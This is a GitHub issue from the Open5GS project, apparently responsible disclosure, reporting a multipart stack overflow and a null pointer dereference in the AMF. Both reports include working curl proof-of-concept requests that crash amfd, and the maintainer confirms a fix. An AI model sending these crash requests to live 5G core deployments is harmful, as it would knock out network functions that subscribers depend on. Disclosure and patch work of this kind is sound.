memory corruption and null pointer dereference #1247

Closed
leommxj opened this issue Nov 16, 2021 · 2 comments

leommxj commented Nov 16, 2021

Thanks for the great project first. I have found some vulnerabilities while reading the source code.

memory corruption in parse_multipart

When an NF receives an SBI (HTTP/2) message with Content-Type: multipart/related, parse_multipart in lib/sbi/message.c will try to parse all parts in the request, but the struct multipart_parser_data_s only has OGS_SBI_MAX_NUM_OF_PART (which is 8) members, and this will cause memory corruption on the stack.
Below is a PoC request to crash amfd (which listens on 127.0.0.5:7777):

    echo -ne '--aboundary\r\nContent-Type: application/json\r\n\r\ndata1\r\n--aboundary\r\nContent-Type: application/json\r\n\r\ndata1\r\n--aboundary\r\nContent-Type: application/json\r\n\r\ndata1\r\n--aboundary\r\nContent-Type: application/json\r\n\r\ndata1\r\n--aboundary\r\nContent-Type: application/json\r\n\r\ndata1\r\n--aboundary\r\nContent-Type: application/json\r\n\r\ndata1\r\n--aboundary\r\nContent-Type: application/json\r\n\r\ndata1\r\n--aboundary\r\nContent-Type: application/json1\r\n\r\ndata1\r\n--aboundary\r\nContent-Type: application/json1\r\n\r\ndata3\r\n--aboundary--\r\n' |curl -X POST --http2-prior-knowledge  http://127.0.0.5:7777/namf-comm/v1/ue-contexts -H "Content-Type: multipart/related; boundary=--aboundary" --data-binary @-

null pointer dereference

namf-comm/v1/ue-contexts/imsi-901700000000001/n1-n2-messages in amf will call amf_namf_comm_handle_n1_n2_message_transfer in src/amf/namf-handler.c.
OpenAPI_n1_n2_message_transfer_req_data_parseFromJSON can parse data without n2_info_container and return n2_info_container as NULL. This will skip the if on line 113:

    n2InfoContainer = N1N2MessageTransferReqData->n2_info_container;
    if (n2InfoContainer) {
        smInfo = n2InfoContainer->sm_info;
        if (!smInfo) {
            ogs_error("No smInfo");
            return OGS_ERROR;
        }
        n2InfoContent = smInfo->n2_info_content;
        if (!n2InfoContent) {
            ogs_error("No n2InfoContent");
            return OGS_ERROR;
        }

In this case n2InfoContent will not be set, but on line 156 n2InfoContent is dereferenced:

    switch (n2InfoContent->ngap_ie_type) {

Below is a PoC to crash amfd (this requires a live UE context; I was using UERANSIM to simulate imsi-901700000000001 here):

    curl -X POST --http2-prior-knowledge http://127.0.0.5:7777/namf-comm/v1/ue-contexts/imsi-901700000000001/n1-n2-messages -d '{
      "skipInd": false,
      "lastMsgIndication": true,
      "pduSessionId": 1,
      "lcsCorrelationId": "string",
      "ppi": 7,
      "5qi": 1,
      "n1n2FailureTxfNotifURI": "string",
      "smfReallocationInd": false,
      "supportedFeatures": "string"
    }'

leommxj from Chaitin Security Research Lab.
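As an added illustration of the bounds check the first report calls for (not Open5GS code, and not the reporter's): a part accumulator with the same fixed capacity that refuses the ninth part instead of writing past the array. MAX_NUM_OF_PART, part_t, multipart_data_t and the boundary-walking helper are hypothetical stand-ins, and the sample bodies are constructed.

```c
#include <stdio.h>
#include <string.h>
/* Hypothetical stand-in for the fixed-size part array the report
 * describes (not the ogs_sbi structures themselves). */
#define MAX_NUM_OF_PART 8
typedef struct {
    const char *content;
} part_t;
typedef struct {
    part_t part[MAX_NUM_OF_PART];
    int num_of_part;
} multipart_data_t;

/* Refuse a part that would not fit instead of writing past part[]. */
int multipart_add_part(multipart_data_t *d, const char *content)
{
    if (d->num_of_part >= MAX_NUM_OF_PART) {
        fprintf(stderr, "too many parts (max %d)\n", MAX_NUM_OF_PART);
        return -1;
    }
    d->part[d->num_of_part++].content = content;
    return 0;
}

/* Walk the "--<boundary>" delimiters of a body and feed each part through the
 * bounded add. Returns parts accepted, or -1 when the message has too many. */
int multipart_count_parts(const char *body, const char *boundary)
{
    multipart_data_t d = { .num_of_part = 0 };
    char delim[64];
    snprintf(delim, sizeof delim, "--%s", boundary);
    size_t dlen = strlen(delim);
    const char *cur = body;
    while ((cur = strstr(cur, delim)) != NULL) {
        cur += dlen;
        if (strncmp(cur, "--", 2) == 0)   /* closing delimiter */
            break;
        if (multipart_add_part(&d, cur) < 0)
            return -1;
    }
    return d.num_of_part;
}

/* Constructed sample bodies with boundary "b" (not from the report). */
#define PART "--b\r\nContent-Type: application/json\r\n\r\ndata\r\n"
static const char body_three[] = PART PART PART "--b--\r\n";
static const char body_eight[] = PART PART PART PART PART PART PART PART "--b--\r\n";
static const char body_nine[] = PART PART PART PART PART PART PART PART PART "--b--\r\n";
```

With the check in place the nine-part body is rejected before the ninth part is stored, which is the behaviour the overflow in the report lacks.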

acetcom added a commit that referenced this issue Nov 16, 2021
1. memory corruption
- Overflow num_of_part in SBI message
2. null pointer dereference
- n2InfoContent->ngap_ie_type

acetcom commented Nov 16, 2021

Hi @leommxj

It's a nice catch. I've fixed it and updated it in the main branch on GitHub.

Thanks a lot!
Sukchan


leommxj commented Nov 17, 2021

That was fast. Great Work.

@leommxj leommxj closed this as completed Nov 17, 2021